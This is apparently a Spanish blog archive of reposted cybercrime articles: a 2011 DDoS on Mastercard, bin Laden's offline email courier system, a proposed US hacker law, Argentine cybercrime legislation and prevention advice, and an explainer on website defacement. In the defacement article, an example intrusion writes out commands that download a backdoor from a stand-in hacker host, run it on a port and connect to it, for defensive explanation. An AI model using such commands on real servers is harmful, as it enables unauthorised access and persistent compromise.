Archivos de la categoría ‘Ciberdelincuencia’


Pasó ya mucho tiempo desde que WikiLeaks era el tema del momento, ya sea por la propia difusión de los cables diplomáticos o la detención de su fundador, Julian Assange. Pero en plena época donde las noticias sobre hackers están a la orden del día, parece que la historia resurgió aunque sea por un momento, debido a un nuevo ataque DDoS contra Mastercard.

El 28 de junio de 2011, fue imposible acceder al sitio de Mastercard o sus páginas cargaron con lentitud, algo que confirmó la propia compañía a través de un comunicado, donde también indicó que no se obtuvieron datos de sus clientes.

A pesar de que Mastercard le atribuyó el problema a su proveedor de servicios de internet, un hacker se hizo cargo de la autoría del hecho explicando en su Twitter que se trataba de una represalia a la empresa de tarjetas de crédito por cortar una importante fuente de financiamiento de WikiLeaks.

Sin embargo, luego de enfrentar diversas barreras en su financiamiento la organización de WikiLeaks hizo oficial a mediados del mes de junio, mediante su cuenta de Twitter, la posibilidad de realizar donaciones mediante “Bitcoins”, una moneda digital que en teoría se muestra imposible al rastreo y no está atada a la administración central de ninguna autoridad.

Sin dudas, es llamativo que todo esto ocurra tantos meses después del surgimiento de WikiLeaks, pero la explicación puede estar en las reorganizaciones que hubo entre los grupos de hackers. Tras el cierre del ciclo de LulzSec, ocurrido el pasado fin de semana, los “hackivistas” se habrían dividido en dos bandos: por un lado los que siguen los lineamientos de Wikileaks como por ejemplo Anonymous y por otro los que rechazan estas acciones.

De este modo parece que estamos más ante una muestra de poder entre dos facciones que ante una iniciativa con un fin específico.

Es muy importante que las medianas y grandes empresas cuenten con herramientas para la protección del perímetro , con un plan de acción ante posibles ataques y que trabajen proactivamente para evitar los riesgos.

En los últimos años hemos visto como las organizaciones han ido aumentando sus recursos en Seguridad Informática, sin embargo, aún nos hace falta entrar en razón de lo vulnerable que es nuestra información y la importancia de protegerla.

De todas formas tengamos en cuenta que más del 70 por ciento de las Violaciones e intrusiones a los recursos informáticos son realizadas por el personal interno, debido a que éste conoce los procesos, metodologías y tiene acceso a la información sensible de su empresa, es decir, a todos aquellos datos cuya pérdida puede afectar el buen funcionamiento de la organización, por lo cual es recomendable poseer dos políticas de protección. (Una interna y otra externa)

Fuente: http://www.sadvisor.com/articulos/articulos_masinfo.php?id=251&secc=articulos&cr=&path=0.280


WASHINGTON.- Osama ben Laden era un escritor prolífico de correos electrónicos y construyó un minucioso sistema que lo mantuvo un paso adelante de los mejores espías estadounidenses a pesar de no tener acceso a Internet en su escondite en Abbotabad, en Paquistán.

Sus métodos, descritos en detalle por un funcionario de antiterrorismo y una segunda persona enterada sobre la investigación de Estados Unidos, le funcionaron bien durante años y frustraron los esfuerzos de Occidente para seguirlo a través del ciberespacio. Los arreglos permitieron a Ben Laden mantenerse en contacto con el mundo sin dejar huellas digitales. Las personas hablaron bajo condición de anonimato para discutir el sensible análisis de inteligencia.

El sistema de Osama fue construido sobre la disciplina y la confianza. Pero también dejó atrás un extenso archivo de intercambio de correo electrónico que Estados Unidos va a investigar. El tesoro de los registros electrónicos retirados de su complejo después de que fue muerto la semana pasada está revelando miles de mensajes y, potencialmente, cientos de direcciones de correo electrónico, dijeron distintas personas.

Encerrado en su recinto amurallado en el noreste de Paquistán, sin teléfono ni conexión a Internet, Ben Laden tenía que escribir un mensaje en su ordenador sin conexión a internet, a continuación guardarlo utilizando una unidad de memoria USB del tamaño del pulgar. Entonces pasaba la memoria a un mensajero de confianza, que se dirigía a un distante cibercafé.

En ese lugar, el mensajero conectaba la unidad de memoria en una computadora, copiaba el mensaje de Ben Laden en un correo electrónico y lo enviaba. Invirtiendo el proceso, el mensajero copiaba cualquier correo electrónico entrante en la memoria y regresaba al complejo, donde el líder de Al-Qaeda leía sus mensajes sin conexión.

Era un proceso lento y laborioso. Y fue tan meticuloso que hasta veteranos funcionarios de inteligencia se han sorprendido de la capacidad de bin Laden para mantenerlo durante tanto tiempo. Estados Unidos siempre sospechó que Ben Laden se comunicaba a través de mensajeros, pero no anticipó el volumen de sus comunicaciones según lo revelado por los materiales que dejó atrás.

El equipo de asalto encontró unas 100 unidades de memoria USB en el complejo de Ben Laden. El rastro de los documentos electrónicos es tan enorme que el gobierno ha contratado a personas que hablen árabe de toda la comunidad de inteligencia para estudiarlos minuciosamente.

En ese sentido, funcionarios del gobierno norteamericano han dicho que los registros no revelaron un nuevo complot terrorista, pero mostraron que Ben Laden seguía involucrado en las operaciones de Al-Qaeda mucho después de que Estados Unidos asumió que había pasado el control a su lugarteniente, el egipcio Ayman al-Zawahiri.

Fuente: La Nación


Tras WikiLeaks, Anonymous o el ataque a Sony desde Amazon, todos movimientos que golpean en la seguridad de muchos estamentos de Estados Unidos, el gobierno de Obama está decidido a endurecer y mucho este tipo de acciones de los hackers. Con el fin de erradicar el daño sustancial que este tipo de ataques ocasiona a las infraestructuras del país, Obama presentó ayer en el Congreso una propuesta legislativa: Pena de prisión obligatoria de un mínimo de tres años para todos los hackers.

No sólo eso, el gobierno también presentó una propuesta de ley nacional de datos con la que refuercen la seguridad de los mismos ante posibles ataques, así como una especie de inmunidad de responsabilidad civil con todas aquellas empresas de infraestructuras crítica (es decir, las empresas defensa, seguridad y de índole económica más importantes del país) con el fin de que exista un intercambio continuo de información con el gobierno vía Homeland Security.

En cualquier caso, detrás de este movimiento está claro que existe la necesidad en el país de potenciar la ciber-seguridad, una vez que han visto la vulnerabilidad de sus sistemas. En el caso de los hackers, se trata de una medida sin igual, ya que en caso de declararse culpable bajo el epígrafe de “seguridad nacional”, no habría posibilidad de reducción de condena o indemnización como en la actividad ordinaria, sino que la figura del “ladrón” informático pasaría a ser un reo “especial” sin varios de los derechos fundamentales del país para un preso.

En definitiva, un estado de alerta, el que se quiere enfatizar desde el gobierno, con todo lo relacionado a la seguridad en la red y los posibles ataques de los que puedan ser blancos. Un movimiento que de aprobarse, se unirá a las normas incluidas en la Payment Card Industry, el sistema impuesto por la Industria de las tarjetas de crédito que obliga a las empresas a adherirse a una lista de protocolos se seguridad como la encriptación de información sensible o la instalación de firewalls o antivirus.

Fuente: Bitelia

Delitos 2.0

Publicado: 16 mayo, 2011 de Bambino0710 en Ciberdelincuencia, Delitos Informaticos, Hacking, Hacktivismo

Un trillón de dólares anuales genera el delito informático a nivel mundial. Se trata de una cifra inabarcable para el público en general, ya que cuando hablamos de trillón son 18 ceros los que se deben agregar a la unidad. Este número supera, por ejemplo, al que se obtiene por el negocio del narcotráfico, una actividad ilícita que genera unos 320.000 millones de dólares anuales. Ambos datos surgen de estadísticas publicadas por la Organización de Naciones Unidas (ONU).

Los delitos informáticos se cometen a través de las altas tecnologías. Es una realidad que se nos impone en esta Era Informática en la que estamos inmersos y que exige una alerta especial de los usuarios, las empresas prestadoras de servicios tecnológicos y del Estado, a través de las fuerzas de seguridad y la justicia. Porque si bien hay múltiples similitudes con otro tipo de crímenes, también hay características propias de estos hechos ilícitos que requieren una mirada y un tratamiento especial.

En la Argentina, los delitos que tienen como medio de ejecución a Internet y a las nuevas tecnologías se tipificaron penalmente a partir de 2008, con la aprobación de la ley 26.388. Se trata de una norma que modifica el código penal. Gracias a su sanción entraron en la órbita de la ilegalidad delitos como la pornografía infantil distribuida a través de la Web o la estafa vía Internet.

“En un sentido amplio, los delitos informáticos son aquellos que se cometen a través de un sistema informático”, explicó Ricardo Sáenz, fiscal general ante la Cámara Nacional de Apelaciones en lo Criminal y Correccional de la Capital Federal y especialista en delitos informáticos. “En un sentido estricto, son los que un país, en un momento dado, define como tales”, agregó Sáenz.

“No hay pena sin ley anterior. Por eso, en la ley 26.388 tenés conductas que antes no estaban previstas como delito, como el acceso ilegítimo a un sistema informático. Pero también tenés otros como la estafa informática. La estafa estuvo prevista siempre por el código penal, pero la estafa cometida a través de un medio informático no estaba previsto como delito. Hubo que preverlo expresamente”, explicó el fiscal.

Este principio, determinó que muchos delitos cometidos antes de 2008 no obtuvieran pena. “Antes de la ley 26.388 se discutía, por ejemplo, que la extracción de plata (de un cajero o vía Internet) de la cuenta de otra persona, no podía ser delito porque se estaba engañando a una máquina y no a una persona”, comentó Sáenz, y agregó: “Este tipo de discusiones eran típicas antes de la sanción de la norma”.

Entonces, si la ley no hubiera existido, tal vez no se podría haber detenido a los cuatro acusados de haber sustraído quinientos mil pesos de la cuenta de un empresario, en el último febrero. Tanto la víctima como los sospechosos residen en Rosario.

EN EL LIMBO

Pero todavía hay acciones que son claramente ilegales y que en este momento, se encuentran en una especie de limbo. Según la secretaria de la fiscalía 1, ante la Cámara de Casación Penal, Carla Delle Donne, quien además es colaboradora de Saenz, “el robo de identidad, a través de medios tecnológicos, no está previsto como tipo penal”.

Delle Donne también reconoció otras conductas que deberían incluirse en una futura modificación de la ley 26.388. Tal es el caso del grooming, que es el acoso de un menor a través de Internet. Por lo general, el pederasta entabla el contacto con el niño o el adolescente y busca ganar su confianza. Una vez conseguida, le pide que a través de la cámara de la computadora le mande imágenes de contenido sexual o se muestre desnudo frente a la computadora. En ese momento el adulto graba la imagen y comienza a extorsionar al menor con publicarla en Internet. Así consigue que la víctima haga lo que él quiera e incluso busca generar un encuentro, que podría terminar en un abuso.

Para evitar que queden fuera del marco de la ilegalidad una serie de actividades delictivas, “hay que tratar de tener neutralidad tecnológica”, aconsejó Sáenz. “Las leyes no tienen que usar terminología muy específica. No se debería crear un tipo penal que hable de los delitos cometidos a través de Facebook, por ejemplo. En la 26.388 se contempla eso. Para evitarlo, se habla de comunicación electrónica”, detalló Sáenz, y agregó: “Cuando hicimos el proyecto de la ley 26.388, en 2005, recién empezábamos a poder enviar mensajes por celular. No había mensajería de Blackberry, ni Twitter. Recién comenzaban a aparecer las redes sociales”.

En cuanto a las penas, la ley 26.388 establece una simetría entre los delitos informáticos y los convencionales. Por ejemplo, el daño a un sistema informático tiene la misma pena que el daño a un bien tangible. Lo mismo en otros delitos.

CAPACITACIÓN ESPECIAL

La plataforma a través de la cual se cometen este tipo de hechos ilícitos exige una capacitación especial. Tanto de los investigadores de las fuerzas policiales, como de los jueces, fiscales y abogados.

“La principal diferencia entre la investigación de este tipo de hechos ilícitos y la de otros convencionales, radica en que la evidencia son datos técnicos: una página web, un correo electrónico”, explicó a DEF una fuente policial. Por eso, uno de los principios básicos para llevar adelante este tipo de investigaciones es la “inmediatez”. Porque hay que evitar que se pierdan los datos informáticos que se busca preservar.

Otra característica que deberían tener las fuerzas especiales dedicadas a la investigación de estos crímenes es la constante actualización, ya que las herramientas van cambiando y, por ende, también la forma de delinquir.

La globalidad con la que se realizan estos hechos ilícitos es otra de las razones que demandan un esfuerzo mayor de las fuerzas de seguridad para detectar a los delincuentes. Por ejemplo, una estafa informática puede afectar a un ciudadano argentino, pero pudo haber sido perpetrada por una persona u organización ilícita de la India.

En el país hay algunas dependencias específicas que se dedican a investigar los crímenes cometidos a través de medios informáticos. La División de Delitos Tecnológicos de la Policía Federal es una. La otra es la División de Delitos Telemáticos de la Policía Metropolitana. Además, hay algunas dependencias en el interior que están capacitadas para estas funciones. Pero como no son todas, estas divisiones prestan asesoramiento, en caso de que la situación lo requiera.

“En general, las fuerzas que tienen investigaciones de este tipo se capacitan en el país y en el exterior. También hay convenios dentro del Mercosur y foros de policías que investigan estos delitos, donde cada uno brinda su experiencia”, aclaró la misma fuente policial.

Pero no ocurre lo mismo en el sistema judicial. Todavía no se ha creado ningún órgano especial que lleve las causas iniciadas por la denuncia de un delito informático. De todas maneras, se está trabajando en la creación de una unidad especializada. “No tiene sentido capacitar a todos los magistrados del país para que todos alcancen el nivel que requiere analizar este tipo de delitos. Sino se pasarían la vida estudiando”, opinó Sáenz. El fiscal dijo que este es el argumento que se utilizó en otros países a la hora de crear fiscalías u otros órganos judiciales especiales para la investigación de delitos tecnológicos.

PREVENCIÓN

Cuando se habla de seguridad, enseguida se asocia con la responsabilidad del Estado de velar por este derecho de sus ciudadanos. Sin embargo, la seguridad informática se aleja de esta concepción, más bien requiere de un esfuerzo personal de cada usuario, ya que cuanto mayor es la intromisión del Estado en la Web, más autoritario se lo percibe.

“Uno podría reclamar que el Estado nos cuide, que nos proteja de lo que pueda pasar a través de Internet. Pero la Web es difícil de controlar materialmente. Además, sería muy difícil reglamentar un control [legítimo] de ese tipo”, comentó Sáenz. “De todos modos, el Estado puede imponer pautas de conducta a los proveedores de servicios tecnológicos. En la Argentina se están discutiendo algunas normas en este sentido”, agregó.

Dado que más que en cualquier otro ámbito, la seguridad en Internet depende de cada usuario, es importante tener en cuenta una serie de cuidados para evitar caer víctimas de un delito informático.

Según Pablo Abad, especialista en seguridad informática del Instituto Tecnológico de Buenos Aires (ITBA), “uno tiene que extrapolar el sentido común que tiene en la vida real a la informática. Por eso, si uno no recibe un paquete entregado por un extraño, tampoco debería hacerlo con un archivo contenido en un mail enviado por un usuario desconocido o que tenga un contenido sospechoso”.

Abad señaló que las principales fallas en la seguridad de Internet ocurren a través del mal uso del correo electrónico y la descarga de programas desconocidos. Con la misma lógica que utilizó en la observación anterior, Abad explicó: “Si uno quiere comprar una cámara de fotos que no conoce, consulta a otros que la tengan. Lo mismo se debería hacer antes de bajar un programa del que no se tienen referencias. Se debe preguntar a usuarios que lo hayan utilizado o buscar referencias en Google, por ejemplo”, y agregó: “Estamos bastante acostumbrados a desconfiar. En la Web ocurren los mismos crímenes, pero creemos que estamos más seguros por no mediar el contacto físico”.

Abrir un mail sospechoso o bajar un programa desconocido, podría hacer que la PC del usuario se convierta en una computadora zombie. Este es uno de los usos más frecuentes que hacen las redes de hackers, según contó Abad. El hecho, probablemente nunca sea detectado por el usuario.

Al convertir la PC en zombie, el delincuente puede utilizar su sistema operativo a su antojo. Frecuentemente lo usa para enviar correos y evitar ser detectado por los filtros de spam. Con un buen número de computadoras zombies uno puede comercializar el envío masivo de mails con la seguridad de que llegarán a los destinatarios. “Hay todo un mercado del spam”, señaló Abad, y afirmó que en una ínfima proporción se usan las computadoras zombies para cometer delitos más graves, como podría ser la distribución de pornografía infantil. Por eso recomendó: “No hay que ser paranoico y dejar de operar sistemas informáticos”.

LOS MÁS DÉBILES

Un capítulo aparte merecen los crímenes que atentan contra los más inocentes e inofensivos: los niños. Anualmente, se generan cincuenta mil imágenes de pornografía infantil en el mundo. Su comercialización crea un negocio de 250 millones de dólares, según las estadísticas publicadas por la ONU. Pero no siempre está el negocio detrás de ello, hay mucha generación de imágenes para uso propio. Lo importante es tener en cuenta que detrás de cada imagen hay un niño abusado.

Internet potencia las posibilidades de abusos sexuales de menores. No solo por la facilidad con la que se puede difundir la pornografía infantil, sino también porque permite que los pederastas contacten a niños a través de las redes sociales de manera sencilla y accesible. Ese es el caso del grooming.

“Frente a estos peligros que corren los niños y los adolescentes que hacen uso indiscriminado de Internet y todos sus servicios, la solución no es la prohibición. Los padres deben educar y acompañar a sus hijos para que hagan un uso responsable de las redes sociales y de Internet”, señaló al respecto el fiscal Sáenz.

Pablo Abinal, socio de Abinal Law & Audit, una firma de profesionales especializados en prevención y control de riesgos operacionales, aconsejó: “Es importante tener la computadora siempre en un lugar compartido. Los padres deben hacer recorridos por los sitios que se visitaron en esa computadora”. Además, recalcó la necesidad de “no dejar solos a los niños con Internet. Hay que hablar sobre potenciales peligros. Explicarles especialmente que nunca deben encontrarse con nadie que se conoce a través de Internet, por ejemplo”.

Abinal insistió en que “lo que tiene mayor importancia es el acompañamiento de los chicos. No hay que caer en conducta prohibitiva, más bien se debe guiarlos”. Un problema es que en el manejo de Internet hay una brecha de conocimiento muy importante entre padres e hijos. Los menores nacieron en una Era Digital y por eso tienen ventaja respecto de sus progenitores en el uso de estas herramientas. De todos modos, Abinal recomendó a los padres involucrarse en el uso y la dinámica de las redes sociales, para que la brecha entre el conocimiento de sus hijos y el de ellos no sea aún mayor. Socialmente deberían intentarse campañas de concientización en estos peligros y amenazas, y en la forma de prevenirlos. Pero las ONG que las han intentado han recibido escaso apoyo estatal y un total desinterés por parte de las empresas, que en otras partes del mundo tienen una actitud social mas responsable”.

NECESIDAD

Para combatir mejor esta problemática, algunos especialistas señalan la necesidad de crear una oficina especializada en delitos informáticos y evidencia digital bajo la órbita del Ministerio Público Fiscal. Esta nueva dependencia actuaría junto con el Departamento de Informática para brindar el asesoramiento jurídico, la colaboración y las herramientas tecnológicas adecuadas a las Fiscalías, para la investigación y persecución penal de este tipo de delitos.

Con el objetivo de evaluar la conveniencia de una oficina de esas características, el propio Ministerio Público Fiscal encaró un relevamiento de las Fiscalías Criminales y Correccionales Federales de todo el país, Fiscalías Nacionales en lo Criminal de Instrucción, Fiscalías Correccionales y Fiscalías de Menores. Ricardo Sáenz señaló que fruto del relevamiento se encontró que los delitos que más se cometen son los de estafa -generalmente, las estafas bancarias, con tarjeta y el phishing- y todos los que afectan a los niños: ya sea por los abusos que surgen a raíz del contacto en la red o por la misma pornografía infantil que circula. “Esas son las columnas más altas, si se ve un gráfico de lo relevado”, destacó Sáenz, al tiempo que aclaró que es difícil saber de cuántos delitos se está hablando, “porque se le ordenó a 200 Fiscalías que contesten y solo 60 lo hicieron”. Por su parte, Carla Delle Donne, al analizar los resultados, señaló que hay que tener en cuenta que “es el primer relevamiento de estas características que se hizo, con lo cual, no hay antecedentes para comparar”.

Las conclusiones a las que arribó el estudio revelan que aunque la División de Delitos en Tecnología y Análisis Criminal de la Policía Federal Argentina es la que más asistencia presta a las Fiscalías, no cuenta con todos los elementos técnicos ni con los recursos humanos que se necesitan para responder de manera adecuada a los requerimientos judiciales. Por ello, el informe concluyó, según relató Delle Donne, que “ante el desarrollo de las tecnologías de la información y la comunicación, es imperiosa la necesidad de crear una Oficina Jurídica y Técnica Especializada en delitos informáticos y evidencia digital en el ámbito del MPF para dar una respuesta eficaz no solo para perseguir los delitos cometidos online, sino a fin de prevenir su comisión”.

EL DELITO UBICUO

Muchos delitos informáticos presentan la complejidad de ser llevados a cabo por personas de un país diferente del de las computadoras zombie que se utilizaron para perpetrar el delito e incluso afectan a usuarios que residen en un tercero. Frente a  este escenario, ¿cómo actúa la ley? “A nivel del derecho –explicó Ricardo Sáenz-, se puede decir que cualquiera de los jueces del lugar donde se manifiesta cualquiera de estas etapas es competente” y destacó que “esto lo que requiere es mucha colaboración internacional”.

Carla Delle Done señaló que “no habría una jurisdicción exclusiva, porque el delito se consuma en distintos lugares. Si bien se produce en diversas etapas, cada una de ellas se puede identificar como un delito independiente”. Actualmente, no existe ningún tratado de cooperación en materia penal que regule este tema. Sí se trabaja a través de notificaciones de la Interpol gracias a las que, por ejemplo en España, se inició una investigación y se pudo averiguar que una dirección IP que se utilizó corresponde a la de un usuario en la Argentina.

Según Sáenz, “en la práctica puede funcionar que sea competente el juez que esté en mejores condiciones de investigarlo, porque tiene las pruebas mas fáciles o porque tiene al imputado más a mano”. Este es el criterio que utiliza la Corte Suprema argentina. “Se llama Teoría de la Ubicuidad –aclaró Sáenz-, o sea que el delito se considera cometido en cualquiera de los lugares donde tuvo algún tramo, y en definitiva se va a considerar competente al que esté en mejores condiciones de investigarlo, o que asegure el derecho de defensa de los imputados o asegure la prueba. Esto es algo muy dinámico, muy cambiante y donde queda casi todo por hacer”, concluyó.

Fuente: DEFDigital


Un mal día entramos a nuestro sitio web, y en lugar de ver nuestra página de siempre nos encontramos con otra portada: “defaced” o “este servidor ha sido hackeado”. Una vez confirmado que realmente es así (que no se trata de un desvío del dominio), debemos identificar en qué nivel ha sido realizada la intrusión: nivel de aplicación o nivel de sistema. En uno u otro nivel los riesgos son distintos, y son distintas las medidas a tomar para corregir el problema.

Una foto del Che Guevara, el símbolo de la anarquía… la cara de un mono… Fido Dido… un paquete de sopa instantánea… Sea cual fuere la nueva “presentación” de nuestro sitio web, lo primero que debemos hacer (además de tranquilizarnos frente al estado de shock que producen estas situaciones) es verificar si el servidor realmente ha sido vulnerado, y que no se trate simplemente de un desvío de DNS.

Voy a resumir el problema del DNS: el Domain Name System es el responsable de traducir los nombres de los sitios a las direcciones IP de los servidores donde éstos están alojados. Así cuando escribimos “www.sitioweb.com” el DNS retorna la dirección IP del servidor (como ser 200.40.129.50). Ahora imaginemos que un servidor DNS (hay millones) ha sido engañado, y en lugar de retornar la dirección IP correcta, nos devuelve la IP de otro server donde se aloja la página web que vemos en lugar de la nuestra.

A este chiste se le llama “DNS spoofing”, y sus efectos normalmente son locales. Es decir: el fallo lo experimentan sólo las máquinas que se basan (resuelven) en el servidor DNS en cuestión (una empresa, un ISP, una ciudad). Y el resto del mundo sigue viendo nuestro sitio web original sin problemas.

Bien, una vez descartado que se trate de DNS spoofing, y confirmado -IP mediante- que nuestro sitio web realmente ha sido modificado, estamos en hora de determinar si el ataque se realizó a nivel de aplicación o a nivel de sistema.

Nivel de Sistema

Es el nivel de acceso que representa más riesgo. Es lo que todo intruso desea lograr en una máquina: tener el control total de los recursos… adueñarse completamente de la máquina con los mismos privilegios que el propio administrador.

El acceso a nivel de sistema implica el acceso al mismo sistema operativo, en última instancia mediante un terminal remoto.

Estos accesos se logran a través de algún servicio mal configurado, o de aplicaciones vulnerables que permitan la ejecución de código arbitrario en el server. Por ejemplo: si tenemos abierto un servicio telnet, o un SSH vulnerable, estamos dando al atacante una terminal de acceso para que simplemente comience a trabajar en su próximo paso que discutiremos en las próximas líneas: la escalada de privilegios.

Otra posible entrada a un sistema es la explotación de servicios vulnerables que permitan desbordamientos de búfers (que nos permitan, aún sin tener un terminal, ejecutar comandos en el sistema operativo).

Consideremos el siguiente caso: un intruso sabe que mediante un sendmail mal configurado, o un proFTPd u otro software, tiene la posibilidad de ejecutar comandos sobre la máquina… Y esos comandos pueden ser:

1) wget http://www.sitiohacker.com/backdoor.tar.gz

2) tar -xvzpf ./backdoor.tar.gz

3) cd backdoor

4) ./backdoor -p 10040

En al paso (1) baja de internet un paquete comprimido conteniendo un software de intrusión (backdoor.tar.gz en nuestro ejemplo). En el paso (2) descomprime el paquete en el directorio actual (no importa cual sea). En el paso (3) se mueve al directorio que ha sido creado tras descomprimir las herramientas. Y en el paso (4) ejecuta un comando que pone a funcionar el servicio “backdoor” escuchando en el puerto TCP 10040. (sólo se trata de un ejemplo: las direcciones y los nombres son ficticios. En la práctica puede haber miles de posibilidades).

Hasta ahora el intruso ha ejecutado estos comandos sin retorno visual: no tiene una pantalla que le permita ver los resultados de lo que está tecleando, ya que la vulnerabilidad le permite sólo enviar los comandos que llegan al sistema operativo mediante una vía alternativa.

Pero ahora el intruso, cómodamente y desde su máquina, puede hacer lo siguiente:

telnet 172.16.100.21 10040

…donde la IP del servidor atacado es 172.16.100.21, y 10040 es el puerto donde el hacker puso a funcionar su aplicación “backdoor”. Ahora sí, el hacker tiene una terminal de acceso a nuestro sistema. Casi con la comodidad de estar en su propia PC. Pero para tener el control total del servidor aún le hace falta realizar otro trabajo:

Escalada de privilegios En el ejemplo anterior describiendo la forma de realizar un acceso, todos los comandos que se ejecutaron en el sistema (incluso la ejecución del programa “backdoor”, y los comandos que a su vez se ejecuten a través de éste) se harán con los privilegios y permisos que tenga el programa a través del cual se accedió al servidor. En caso de haber accedido por una brecha de proFTPd, seremos el usuario “ftp“, o “nobody”: usuarios menores, con privilegios recortados, incapaces de realizar grandes cambios en la configuración del servidor.

La “escalada de privilegios” tiene un nombre bien autoexplicativo: consiste en la realización de uno o más ataques a programas locales mal configurados, y a través de los mismos ir logrando nuevos privilegios, hasta tomar el lugar del superusuario root (o wheel en los BSD). Sobre este punto se pueden escribir decenas de libros, pero su profundización está fuera de los objetivos de este artículo.

Quien se haya tomado el trabajo de acceder de esta forma a un servidor, difícilmente sea tan estúpido como para dedicarse a modificar las páginas web poniendo “servidor hackeado”. Por el contrario: esta categoría de intrusos permanece en silencio, tratan de permanecer inadvertidos durante todo el tiempo posible para así poder sacar el máximo provecho posible de “su nuevo servidor”. Tal vez sólo al final, como broche de oro, tome la iniciativa de cambiar la portada del sitio web (cuando el servidor no le sirva más para sus objetivos, o si es descubierto y se da cuenta de que va a ser expulsado).

Nivel de Aplicación

Los ataques a nivel de aplicación son aquellos que se realizan explotando vulnerabilidades de aplicaciones que permitan modificar los datos que la propia aplicación manipula, pero sin la posibilidad de ejecución de comandos sobre el sistema operativo.

Ejemplos: la modificación o borrado de contenidos en un sistema de gestión de portales, como phpNuke o Mambo. O la manipulación de una base de datos SQL mediante un acceso no autorizado a un phpMyAdmin vulnerable.

En este tipo de ataques el intruso puede cambiar lo que desee en nuestro sitio web, o en nuestras bases de datos. Pero no se puede considerar que el servidor esté comprometido, ni que el intruso haya entrado efectivamente en el sistema.

Los ataques a nivel de aplicación son los más comunes y visibles (y los más populares entre los chicos traviesos aficionados a romper cosas). De modo que el servidor -a pesar de estos ataques- permanece intacto. La seriedad y la gravedad de estos ataques depende de la importancia de la aplicación web atacada: no es lo mismo un ataque de este tipo en una galería de fotos online, que en una aplicación de procesamiento de pagos y transferencias financieras.

Conclusiones

En el caso de las intrusiones a nivel de sistema, se debe realizar un análisis forense del servidor atacado. Y en muchos casos, la única solución realmente segura es la reinstalación del sistema operativo y de todas las aplicaciones desde cero.

En el caso de las intrusiones a nivel de aplicación, basta con sustituír la aplicación vulnerable por una versión “parchada” que cierre las brechas de seguridad usadas por los intrusos.

Y en cuanto al contenido y los datos… el lector podrá deducir que sólo los respaldos nos permitirán poner todo a funcionar en tiempo y forma (¿verdad que SIEMPRE hacemos los RESPALDOS de TODA nuestra INFORMACION?)

Ing. Eduardo González González (*)

(*) Consultor en Sistemas de Seguridad